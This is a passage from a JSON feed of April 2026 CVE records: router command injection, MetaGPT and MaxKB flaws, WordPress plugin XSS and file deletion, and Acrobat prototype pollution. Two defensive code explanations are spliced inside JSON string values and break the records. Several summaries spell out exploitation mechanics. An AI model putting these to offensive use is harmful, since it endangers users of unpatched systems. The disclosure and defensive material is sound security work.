The project was informed of the problem early through an issue report but has not responded yet.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00856,"ranking_epss":0.74972,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/AstrBotDevs/AstrBot/","https://github.com/AstrBotDevs/AstrBot/issues/7169","https://vuldb.com/submit/792655","https://vuldb.com/vuln/356978","https://vuldb.com/vuln/356978/cti"],"published_time":"2026-04-12T05:16:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6115","summary":"A flaw has been found in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setAppCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument enable can lead to os command injection. The attack may be launched remotely. The exploit has been published and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_180/README.md","https://vuldb.com/submit/792248","https://vuldb.com/vuln/356975","https://vuldb.com/vuln/356975/cti","https://www.totolink.net/"],"published_time":"2026-04-12T05:16:00","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6113","summary":"A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this vulnerability is the function setTtyServiceCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument ttyEnable leads to os command injection. The attack can be launched remotely. 
The exploit has been disclosed publicly and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_178/README.md","https://vuldb.com/submit/792246","https://vuldb.com/vuln/356973","https://vuldb.com/vuln/356973/cti","https://www.totolink.net/"],"published_time":"2026-04-12T04:16:49","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6114","summary":"A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this issue is the function setNetworkCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument proto results in os command injection. The attack may be initiated remotely. The exploit is now public and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_179/README.md","https://vuldb.com/submit/792247","https://vuldb.com/vuln/356974","https://vuldb.com/vuln/356974/cti","https://www.totolink.net/"],"published_time":"2026-04-12T04:16:49","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6112","summary":"A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Affected is the function setRadvdCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument maxRtrAdvInterval causes os command injection. The attack can be initiated remotely. 
The exploit has been made available to the public and could be used for attacks.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_177/README.md","https://vuldb.com/submit/792245","https://vuldb.com/vuln/356972","https://vuldb.com/vuln/356972/cti","https://www.totolink.net/"],"published_time":"2026-04-12T04:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6110","summary":"A vulnerability was identified in FoundationAgents MetaGPT up to 0.8.1. This affects the function generate_thoughts of the file metagpt/strategy/tot.py of the component Tree-of-Thought Solver. The manipulation leads to code injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.00052,"ranking_epss":0.16159,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/FoundationAgents/MetaGPT/","https://github.com/FoundationAgents/MetaGPT/issues/1933","https://github.com/FoundationAgents/MetaGPT/pull/1946","https://vuldb.com/submit/791761","https://vuldb.com/vuln/356970","https://vuldb.com/vuln/356970/cti"],"published_time":"2026-04-12T03:16:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6111","summary":"A security flaw has been discovered in FoundationAgents MetaGPT up to 0.8.1. This impacts the function decode_image of the file metagpt/utils/common.py. The manipulation of the argument img_url_or_b64 results in server-side request forgery. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. 
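The Totolink entries above (CVE-2026-6112 through CVE-2026-6116: the `ip`, `enable`, `ttyEnable`, `proto` and `maxRtrAdvInterval` arguments of `/cgi-bin/cstecgi.cgi` reaching an OS command) and the AstrBot `add_mcp_server` `command` argument (CVE-2026-6118) share one shape: a request value is placed into a command line that a shell parses. The following is an added example written for this page, not code from Totolink, AstrBot or MaxKB. It shows the injectable pattern next to a handler that validates each argument for what it is and passes it as a single argv element with no shell involved. The validators, the parameter vocabulary and the `ping` invocation are assumptions for illustration:

```python
# Added example (not vendor code): request arguments -> command without a shell.
import ipaddress
import re
import shlex
import subprocess


def unsafe_command_line(ip: str) -> str:
    """The injectable pattern, the Python equivalent of sprintf()+system():
    the value is embedded in a string that /bin/sh will parse."""
    return f"ping -c 1 {ip}"


def shell_tokens(command_line: str) -> list:
    """Tokens a POSIX shell would see. ';', '|', '&', '(' and ')' separate
    or chain commands, so text after them runs as its own command."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    return list(lexer)


def validate_ip(value: str) -> str:
    """'ip'-style argument: must parse as an IPv4/IPv6 literal, nothing else."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        raise ValueError(f"not an IP address: {value!r}") from None


def validate_flag(value: str) -> int:
    """'enable' / 'ttyEnable'-style argument: exactly '0' or '1'."""
    if value not in ("0", "1"):
        raise ValueError(f"flag must be 0 or 1: {value!r}")
    return int(value)


NETWORK_PROTOS = frozenset({"dhcp", "static", "pppoe"})   # assumed vocabulary


def validate_choice(value: str, allowed: frozenset) -> str:
    """'proto'-style argument: a fixed vocabulary, compared for equality."""
    if value not in allowed:
        raise ValueError(f"unsupported value: {value!r}")
    return value


def validate_int_range(value: str, lo: int, hi: int) -> int:
    """'maxRtrAdvInterval'-style argument: ASCII decimal digits in a range."""
    if not re.fullmatch(r"[0-9]+", value):
        raise ValueError(f"not a decimal integer: {value!r}")
    n = int(value)
    if not lo <= n <= hi:
        raise ValueError(f"{n} outside {lo}..{hi}")
    return n


def diagnosis_argv(params: dict) -> list:
    """argv for a diagnostic ping. The validated literal cannot contain shell
    metacharacters or start with '-', so it can be neither a second command
    nor an option."""
    ip = validate_ip(params.get("ip", ""))
    return ["ping", "-c", "1", ip]


def run_argv(argv: list) -> subprocess.CompletedProcess:
    """Launch without a shell: the list form is passed straight to execve(),
    no string is re-parsed (shell=False is the default)."""
    return subprocess.run(argv, capture_output=True, text=True, timeout=10)


def rejects(validator, *args) -> bool:
    """True if the validator raises ValueError for these inputs."""
    try:
        validator(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(shell_tokens(unsafe_command_line("192.0.2.1;reboot")))
    print(diagnosis_argv({"ip": "192.0.2.1"}))
```

The `shell_tokens` output for the injected value makes the failure visible: `reboot` becomes a separate command. With `diagnosis_argv`, the same input never gets that far because it is not an IP literal, and a value that does validate is handed to `execve()` as one argument.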
The project was informed of the problem early through an issue report but has not responded yet.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00043,"ranking_epss":0.12853,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/FoundationAgents/MetaGPT/","https://github.com/FoundationAgents/MetaGPT/issues/1934","https://github.com/FoundationAgents/MetaGPT/pull/1941","https://vuldb.com/submit/791762","https://vuldb.com/vuln/356971","https://vuldb.com/vuln/356971/cti"],"published_time":"2026-04-12T03:16:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-1116","summary":"A Cross-site Scripting (XSS) vulnerability was identified in the `from_dict` method of the `AppLollmsMessage` class in parisneo/lollms prior to version 2.2.0. The vulnerability arises from the lack of sanitization or HTML encoding of the `content` field when deserializing user-provided data. This allows an attacker to inject malicious HTML or JavaScript payloads, which can be executed in the context of another user's browser. Exploitation of this vulnerability can lead to account takeover, session hijacking, or wormable attacks.","cvss":8.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.2,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01464,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a","https://huntr.com/bounties/d3d076a7-2a51-4e07-8d0e-91e28e76788e"],"published_time":"2026-04-12T03:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6109","summary":"A vulnerability was determined in FoundationAgents MetaGPT up to 0.8.1. The impacted element is the function evaluateCode of the file metagpt/environment/minecraft/mineflayer/index.js of the component Mineflayer HTTP API. Executing a manipulation can lead to cross-site request forgery. The attack may be performed from remote. 
The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.","cvss":5.3,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":4.3,"cvss_v4":5.3,"epss":5e-05,"ranking_epss":0.00253,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/FoundationAgents/MetaGPT/","https://github.com/FoundationAgents/MetaGPT/issues/1932","https://vuldb.com/submit/791759","https://vuldb.com/vuln/356969","https://vuldb.com/vuln/356969/cti"],"published_time":"2026-04-12T02:16:00","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6107","summary":"A flaw has been found in 1Panel-dev MaxKB up to 2.6.1. This issue affects some unknown processing of the file apps/common/middleware/chat_headers_middleware.py of the component ChatHeadersMiddleware. This manipulation of the argument Name causes cross site scripting. Remote exploitation of the attack is possible. Upgrading to version 2.8.0 is capable of addressing this issue. Patch name: 026a2d623e2aa5efa67c4834651e79d5d7cab1da. Upgrading the affected component is advised. 
The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.","cvss":5.1,"cvss_version":4.0,"cvss_v2":4.0,"cvss_v3":3.5,"cvss_v4":5.1,"epss":0.00033,"ranking_epss":0.09303,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/","https://github.com/1Panel-dev/MaxKB/commit/026a2d623e2aa5efa67c4834651e79d5d7cab1da","https://github.com/1Panel-dev/MaxKB/pull/4919","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/AnalogyC0de/public_exp/issues/24","https://vuldb.com/submit/782263","https://vuldb.com/vuln/356966","https://vuldb.com/vuln/356966/cti"],"published_time":"2026-04-12T01:16:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6108","summary":"A vulnerability was found in 1Panel-dev MaxKB up to 2.6.1. The affected element is the function execute of the file apps/application/flow/step_node/mcp_node/impl/base_mcp_node.py of the component Model Context Protocol Node. Performing a manipulation results in os command injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. You should upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00201,"ranking_epss":0.42244,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/AnalogyC0de/public_exp/issues/30","https://vuldb.com/submit/782279","https://vuldb.com/vuln/356968","https://vuldb.com/vuln/356968/cti"],"published_time":"2026-04-12T01:16:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6106","summary":"A vulnerability was detected in 1Panel-dev MaxKB up to 2.2.1. 
This vulnerability affects the function StaticHeadersMiddleware of the file apps/common/middleware/static_headers_middleware.py of the component Public Chat Interface. The manipulation of the argument Name results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used. Upgrading to version 2.8.0 is able to resolve this issue. The patch is identified as 026a2d623e2aa5efa67c4834651e79d5d7cab1da. It is recommended to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.","cvss":5.1,"cvss_version":4.0,"cvss_v2":4.0,"cvss_v3":3.5,"cvss_v4":5.1,"epss":0.00033,"ranking_epss":0.09303,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/","https://github.com/1Panel-dev/MaxKB/commit/026a2d623e2aa5efa67c4834651e79d5d7cab1da","https://github.com/1Panel-dev/MaxKB/pull/4919","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/AnalogyC0de/public_exp/issues/23","https://vuldb.com/submit/781810","https://vuldb.com/vuln/356965","https://vuldb.com/vuln/356965/cti"],"published_time":"2026-04-11T23:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6105","summary":"A security vulnerability has been detected in perfree go-fastdfs-web up to 1.3.7. This affects an unknown part of the file src/main/java/com/perfree/controller/InstallController.java of the component doInstall Interface. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. 
The vendor was contacted early about this disclosure but did not respond in any way.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.00038,"ranking_epss":0.11238,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gitee.com/ying-xiujie/cve/issues/IGB6M9","https://vuldb.com/submit/781598","https://vuldb.com/vuln/356964","https://vuldb.com/vuln/356964/cti"],"published_time":"2026-04-11T22:16:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31845","summary":"A reflected cross-site scripting (XSS) vulnerability exists in Rukovoditel CRM version 3.6.4 and earlier in the Zadarma telephony API endpoint (/api/tel/zadarma.php). The application directly reflects user-supplied input from the 'zd_echo' GET parameter into the HTTP response without proper sanitization, output encoding, or content-type restrictions.\n\nThe vulnerable code is:\n\nif (isset($_GET['zd_echo'])) exit($_GET['zd_echo']);\n\nAn unauthenticated attacker can exploit this issue by crafting a malicious URL containing JavaScript payloads. 
When a victim visits the link, the payload executes in the context of the application within the victim's browser, potentially leading to session hijacking, credential theft, phishing, or account takeover.\n\nThe issue is fixed in version 3.7, which introduces proper input validation and output encoding to prevent script injection.","cvss":9.3,"cvss_version":4.0,"cvss_v2":6.4,"cvss_v3":9.3,"cvss_v4":9.3,"epss":0.00017,"ranking_epss":0.03937,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://forum.rukovoditel.net/viewtopic.php?p=22499#p22499"],"published_time":"2026-04-11T19:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23900","summary":"Various stored XSS vulnerabilities in the maps- and icon rendering logic in Phoca Maps component 5.0.0-6.0.2 have been discovered.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08133,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://phoca.cz/"],"published_time":"2026-04-11T14:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32146","summary":"Improper path validation vulnerability in the Gleam compiler's handling of git dependencies allows arbitrary file system modification during dependency download.\n\nDependency names from gleam.toml and manifest.toml are incorporated into filesystem paths without sufficient validation or confinement to the intended dependency directory, allowing attacker-controlled paths (via relative traversal such as ../ or absolute paths) to target filesystem locations outside that directory. When resolving git dependencies (e.g. via gleam deps download), the computed path is used for filesystem operations including directory deletion and creation.\n\nThis vulnerability occurs during the dependency resolution and download phase, which is generally expected to be limited to fetching and preparing dependencies within a confined directory. 
A malicious direct or transitive git dependency can exploit this issue to delete and overwrite arbitrary directories outside the intended dependency directory, including attacker-chosen absolute paths, potentially causing data loss. In some environments, this may be further leveraged to achieve code execution, for example by overwriting git hooks or shell configuration files.\n\nThis issue affects Gleam from 1.9.0-rc1 until 1.15.4.","cvss":8.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.3,"epss":0.00015,"ranking_epss":0.03088,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cna.erlef.org/cves/CVE-2026-32146.html","https://github.com/gleam-lang/gleam/commit/1aa5d8e594b0aa240bb213fce6ee19c65e6d5bcf","https://github.com/gleam-lang/gleam/commit/2dc0467f822c75de94697a912755d172928ee40a","https://github.com/gleam-lang/gleam/security/advisories/GHSA-vq5j-55vx-wq8j","https://osv.dev/vulnerability/EEF-CVE-2026-32146"],"published_time":"2026-04-11T14:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5809","summary":"The wpForo Forum plugin for WordPress is vulnerable to Arbitrary File Deletion in versions up to and including 3.0.2. This is due to a two-step logic flaw: the topic_add() and topic_edit() action handlers accept arbitrary user-supplied data[*] arrays from $_REQUEST and store them as postmeta without restricting which fields may contain array values. Because 'body' is included in the allowed topic fields list, an attacker can supply data[body][fileurl] with an arbitrary file path (e.g., wp-config.php or an absolute server path). This poisoned fileurl is persisted to the plugin's custom postmeta database table. 
Subsequently, when the attacker submits wpftcf_delete[]=body on a topic_edit request, the add_file() method retrieves the stored postmeta record, extracts the attacker-controlled fileurl, passes it through wpforo_fix_upload_dir() which only rewrites legitimate wpforo upload paths and returns all other paths unchanged, and then calls wp_delete_file() on the unvalidated path. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files writable by the PHP process on the server, including critical files such as wp-config.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00034,"ranking_epss":0.09969,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/wpforo/tags/3.0.2/classes/Actions.php#L746","https://plugins.trac.wordpress.org/browser/wpforo/tags/3.0.2/classes/Actions.php#L761","https://plugins.trac.wordpress.org/browser/wpforo/tags/3.0.2/classes/PostMeta.php#L402","https://plugins.trac.wordpress.org/browser/wpforo/tags/3.0.2/classes/PostMeta.php#L421","https://plugins.trac.wordpress.org/browser/wpforo/tags/3.0.2/classes/PostMeta.php#L523","https://plugins.trac.wordpress.org/browser/wpforo/tags/3.0.2/classes/Posts.php#L1961","https://plugins.trac.wordpress.org/browser/wpforo/tags/3.0.2/includes/functions.php#L2641","https://plugins.trac.wordpress.org/changeset/3503313/wpforo","https://www.wordfence.com/threat-intel/vulnerabilities/id/0e46ac8d-89ee-4480-bb96-83f2044a4323?source=cve"],"published_time":"2026-04-11T08:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34621","summary":"Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":0.06081,"ranking_epss":0.90769,"kev":true,"propose_action":"Adobe Acrobat and Reader contain a prototype pollution vulnerability that allows for arbitrary code execution.","ransomware_campaign":"Unknown","references":["https://helpx.adobe.com/security/products/acrobat/apsb26-43.html","https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34621"],"published_time":"2026-04-11T07:16:03","vendor":"adobe","product":"acrobat_dc","version":null},{"cve_id":"CVE-2026-34621","summary":"Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":0.06081,"ranking_epss":0.90769,"kev":true,"propose_action":"Adobe Acrobat and Reader contain a prototype pollution vulnerability that allows for arbitrary code execution.","ransomware_campaign":"Unknown","references":["https://helpx.adobe.com/security/products/acrobat/apsb26-43.html","https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34621"],"published_time":"2026-04-11T07:16:03","vendor":"adobe","product":"acrobat_reader_dc","version":null},{"cve_id":"CVE-2026-34621","summary":"Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":0.06081,"ranking_epss":0.90769,"kev":true,"propose_action":"Adobe Acrobat and Reader contain a prototype pollution vulnerability that allows for arbitrary code execution.","ransomware_campaign":"Unknown","references":["https://helpx.adobe.com/security/products/acrobat/apsb26-43.html","https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34621"],"published_time":"2026-04-11T07:16:03","vendor":"apple","product":"macos","version":null},{"cve_id":"CVE-2026-34621","summary":"Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":0.06081,"ranking_epss":0.90769,"kev":true,"propose_action":"Adobe Acrobat and Reader contain a prototype pollution vulnerability that allows for arbitrary code execution.","ransomware_campaign":"Unknown","references":["https://helpx.adobe.com/security/products/acrobat/apsb26-43.html","https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34621"],"published_time":"2026-04-11T07:16:03","vendor":"microsoft","product":"windows","version":null},{"cve_id":"CVE-2026-34621","summary":"Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":0.06081,"ranking_epss":0.90769,"kev":true,"propose_action":"Adobe Acrobat and Reader contain a prototype pollution vulnerability that allows for arbitrary code execution.","ransomware_campaign":"Unknown","references":["https://helpx.adobe.com/security/products/acrobat/apsb26-43.html","https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34621"],"published_time":"2026-04-11T07:16:03","vendor":"adobe","product":"acrobat","version":null},{"cve_id":"CVE-2026-5226","summary":"The Optimole – Optimize Images in Real Time plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via URL paths in versions up to, and including, 4.2.3 This is due to insufficient output escaping on user-supplied URL paths in the get_current_url() function, which are inserted into JavaScript code via str_replace() without proper JavaScript context escaping in the replace_content() function. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":0.00099,"ranking_epss":0.2705,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/optimole-wp/tags/4.2.1/inc/admin.php#L1012","https://plugins.trac.wordpress.org/browser/optimole-wp/tags/4.2.1/inc/manager.php#L459","https://plugins.trac.wordpress.org/browser/optimole-wp/tags/4.2.1/inc/manager.php#L542","https://plugins.trac.wordpress.org/browser/optimole-wp/trunk/inc/admin.php#L1012","https://plugins.trac.wordpress.org/browser/optimole-wp/trunk/inc/manager.php#L459","https://plugins.trac.wordpress.org/browser/optimole-wp/trunk/inc/manager.php#L542","https://plugins.trac.wordpress.org/changeset/3498040/optimole-wp/trunk/inc/manager.php","https://plugins.trac.wordpress.org/changeset?old_path=%2Foptimole-wp/tags/4.2.3&new_path=%2Foptimole-wp/tags/4.2.4","https://www.wordfence.com/threat-intel/vulnerabilities/id/112cea93-fa4b-4692-8c8b-e74255f61939?source=cve"],"published_time":"2026-04-11T02:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-3498","summary":"The BlockArt Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'clientId' block attribute in all versions up to, and including, 2.2.15. This is due to insufficient input sanitization and output escaping. 
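Four entries above are output-encoding failures in different contexts: CVE-2026-31845 echoes `zd_echo` straight into the response body, CVE-2026-1116 stores an unencoded `content` field, CVE-2026-6106/CVE-2026-6107 reflect a `Name` value into HTML, and CVE-2026-5226 inserts a URL path into JavaScript source with `str_replace()`. The following is an added example written for this page, not code from Rukovoditel, lollms, MaxKB or Optimole. It places each unsafe shape beside the encoding for the context the value lands in; function names are ours:

```python
# Added example (not vendor code): context-aware output encoding.
import html
import json


def reflect_unsafe(value: str) -> str:
    """exit($_GET['zd_echo']) in Python: the raw value is the response body."""
    return value


def encode_for_html(value: str) -> str:
    """Text and quoted-attribute context: & < > " ' become entities."""
    return html.escape(value, quote=True)


def render_message_unsafe(content: str) -> str:
    """Stored content dropped into markup as-is."""
    return f'<div class="msg">{content}</div>'


def render_message(content: str) -> str:
    return f'<div class="msg">{encode_for_html(content)}</div>'


def encode_for_js_string(value: str) -> str:
    """JavaScript string-literal context. json.dumps yields a double-quoted
    literal with quotes, backslashes and control characters escaped and,
    with the default ensure_ascii=True, U+2028/U+2029 as \\u escapes. What it
    does not do is stop '</script>' inside the literal from ending the
    script element, so '</' is escaped too ('<\\/' is valid JSON and JS)."""
    return json.dumps(value).replace("</", "<\\/")


def js_literal_round_trips(value: str) -> bool:
    """The encoded literal still decodes to the original string."""
    return json.loads(encode_for_js_string(value)) == value


def inline_script_unsafe(current_url: str) -> str:
    """str_replace() of the URL into JavaScript source."""
    return '<script>var currentUrl = "' + current_url + '";</script>'


def inline_script(current_url: str) -> str:
    return f"<script>var currentUrl = {encode_for_js_string(current_url)};</script>"


def echo_response_headers() -> dict:
    """For an endpoint that must echo raw input (an API liveness probe):
    declare it as plain text and forbid sniffing it into HTML."""
    return {"Content-Type": "text/plain; charset=utf-8",
            "X-Content-Type-Options": "nosniff"}


if __name__ == "__main__":
    print(inline_script_unsafe('";alert(1);//'))
    print(inline_script('";alert(1);//'))
```

The JavaScript case is the one most often encoded wrongly: HTML-escaping a value that lands inside `<script>` does nothing, because the script body is raw text to the HTML parser, while the JSON literal form handles both the quote breakout and the `</script>` closing-tag breakout.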
This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","cvss":6.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.4,"cvss_v4":null,"epss":0.0003,"ranking_epss":0.08525,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/blockart-blocks/tags/2.2.15/includes/BlockTypes/PostTemplate.php#L67","https://plugins.trac.wordpress.org/browser/blockart-blocks/tags/2.2.15/includes/BlockTypes/QueryLoop.php#L43","https://plugins.trac.wordpress.org/changeset?old_path=%2Fblockart-blocks/tags/2.2.15&new_path=%2Fblockart-blocks/tags/2.3.0","https://www.wordfence.com/threat-intel/vulnerabilities/id/7d0cb432-785a-4f38-830f-72b95e65aa5a?source=cve"],"published_time":"2026-04-11T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4895","summary":"The GreenShift - Animation and Page Builder Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 12.8.9 This is due to insufficient input sanitization and output escaping in the gspb_greenShift_block_script_assets() function. The function uses str_replace() to insert 'fetchpriority=\"high\"' before 'src=' attributes when processing greenshift-blocks/image blocks with the disablelazy attribute enabled. Because this replacement operates on the entire HTML string without parsing, contributors can inject the string 'src=' into HTML attribute values (such as class attributes). When the str_replace executes, the double quotes in the replacement string break out of the attribute context, allowing injection of malicious HTML attributes like onfocus with JavaScript payloads. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","cvss":6.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.4,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10423,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/greenshift-animation-and-page-builder-blocks/tags/12.8.6/init.php#L866","https://plugins.trac.wordpress.org/browser/greenshift-animation-and-page-builder-blocks/tags/12.8.6/init.php#L889","https://plugins.trac.wordpress.org/browser/greenshift-animation-and-page-builder-blocks/trunk/init.php#L866","https://plugins.trac.wordpress.org/browser/greenshift-animation-and-page-builder-blocks/trunk/init.php#L889","https://plugins.trac.wordpress.org/changeset/3494855/greenshift-animation-and-page-builder-blocks/trunk/init.php","https://plugins.trac.wordpress.org/changeset?old_path=%2Fgreenshift-animation-and-page-builder-blocks/tags/12.8.9&new_path=%2Fgreenshift-animation-and-page-builder-blocks/tags/12.9.0","https://www.wordfence.com/threat-intel/vulnerabilities/id/6e3ae3c6-a7d1-46f0-a006-996c1fbe7c7e?source=cve"],"published_time":"2026-04-11T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4979","summary":"The UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WP plugin for WordPress is vulnerable to blind Server-Side Request Forgery in all versions up to, and including, 1.2.58. This is due 